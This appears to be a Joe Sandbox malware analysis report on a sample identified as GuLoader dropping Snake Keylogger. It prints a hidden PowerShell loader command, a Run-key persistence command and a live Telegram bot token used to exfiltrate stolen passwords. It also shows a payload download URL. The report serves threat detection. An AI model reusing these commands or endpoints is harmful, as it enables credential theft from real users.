Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Torpernes.exe

Overview

General Information

Sample name:Torpernes.exe
Analysis ID:1481480
MD5:ecc4ff0ee7d123f0e90587ea3a7b9ae3
SHA1:70e6f747f9bae57619817beb11f836fa8a873726
SHA256:1e0a46fd7b7b0706d4d5918ba666abdcccc67be4be89874b5cb2ca9ea8b12a83
Tags:exe
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Torpernes.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\Torpernes.exe" MD5: ECC4FF0EE7D123F0E90587EA3A7B9AE3)
    • powershell.exe (PID: 7440 cmdline: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Contentious.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Local\Temp\Contentious.exe" MD5: ECC4FF0EE7D123F0E90587EA3A7B9AE3)
        • cmd.exe (PID: 8012 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 8060 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage?chat_id=5811709821"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2944378842.0000000021031000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000006.00000002.2944378842.0000000020FAA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            Click to see the 4 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)", CommandLine: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Torpernes.exe", ParentImage: C:\Users\user\Desktop\Torpernes.exe, ParentProcessId: 7408, ParentProcessName: Torpernes.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)", ProcessId: 7440, ProcessName: powershell.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\crisscrossing
            Sigma detected: Direct Autorun Keys Modification
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8012, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)", ProcessId: 8060, ProcessName: reg.exe
            Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Contentious.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Contentious.exe, ParentProcessId: 7972, ParentProcessName: Contentious.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)", ProcessId: 8012, ProcessName: cmd.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)", CommandLine: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Torpernes.exe", ParentImage: C:\Users\user\Desktop\Torpernes.exe, ParentProcessId: 7408, ParentProcessName: Torpernes.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)", ProcessId: 7440, ProcessName: powershell.exe

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-25T09:56:55.795858+0200
            SID:2803305
            Source Port:49746
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-25T09:56:44.263078+0200
            SID:2803274
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-25T09:57:07.855040+0200
            SID:2853006
            Source Port:49753
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T09:56:49.886487+0200
            SID:2803274
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-25T09:56:51.785131+0200
            SID:2022930
            Source Port:443
            Destination Port:49742
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T09:56:47.794238+0200
            SID:2803305
            Source Port:49739
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-25T09:56:47.325602+0200
            SID:2803274
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-25T09:56:12.458951+0200
            SID:2022930
            Source Port:443
            Destination Port:49730
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T09:56:41.888830+0200
            SID:2803270
            Source Port:49736
            Destination Port:443
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-25T09:56:53.587006+0200
            SID:2803305
            Source Port:49744
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage?chat_id=5811709821"}
            Source: Contentious.exe.7972.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage"}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238291E0 CryptUnprotectData,6_2_238291E0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23829941 CryptUnprotectData,6_2_23829941
            Source: Torpernes.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 185.98.5.168:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
            Source: Torpernes.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ore.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006D84000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_0040615C FindFirstFileW,FindClose,0_2_0040615C
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004056A1
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_0040615C FindFirstFileW,FindClose,6_2_0040615C
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_00402770 FindFirstFileW,6_2_00402770
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_004056A1
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 0015FA39h6_2_0015F778
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_0015E005
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 0015E61Fh6_2_0015E431
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 0015EFA9h6_2_0015E431
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_0015D7F0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_0015DE23
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CB15D8h6_2_20CB11C0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CB1011h6_2_20CB0D60
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBFB81h6_2_20CBF8D8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBF729h6_2_20CBF480
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CB0751h6_2_20CB04A0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBC761h6_2_20CBC4B8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CB02F1h6_2_20CB0040
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBC309h6_2_20CBC060
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBBEB1h6_2_20CBBC08
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBF2D1h6_2_20CBF028
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBD469h6_2_20CBD1C0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CB15D8h6_2_20CB11B0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBD011h6_2_20CBCD68
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CB0BB1h6_2_20CB0900
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CB15D8h6_2_20CB1506
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBCBB9h6_2_20CBC910
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBE171h6_2_20CBDEC8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBDD19h6_2_20CBDA70
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBD8C1h6_2_20CBD618
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBEE79h6_2_20CBEBD0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBBA59h6_2_20CBB7B0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBB601h6_2_20CBB358
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBEA21h6_2_20CBE778
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBB1A9h6_2_20CBAF00
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 20CBE5C9h6_2_20CBE320
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 238288EDh6_2_238285B0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 23820741h6_2_23820498
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 238272A2h6_2_23826FF8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 238269C9h6_2_23826720
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_23823350
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_23823360
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 23826E21h6_2_23826B78
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 23826571h6_2_238262C8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 23825CC1h6_2_23825A18
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 23826119h6_2_23825E70
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 23825869h6_2_238255C0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 23827FA9h6_2_23827D00
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 238253E9h6_2_23825140
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 23828401h6_2_23828158
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 23827B51h6_2_238278A8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 23820B99h6_2_238208F0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 238202E9h6_2_23820040
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 4x nop then jmp 238276F9h6_2_23827450

            Networking

            barindex
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendDocument?chat_id=5811709821&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcad4b8239f5aaHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /image/bwSNbczRiJIuD15.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: domzeleni.kzCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /image/bwSNbczRiJIuD15.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: domzeleni.kzCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
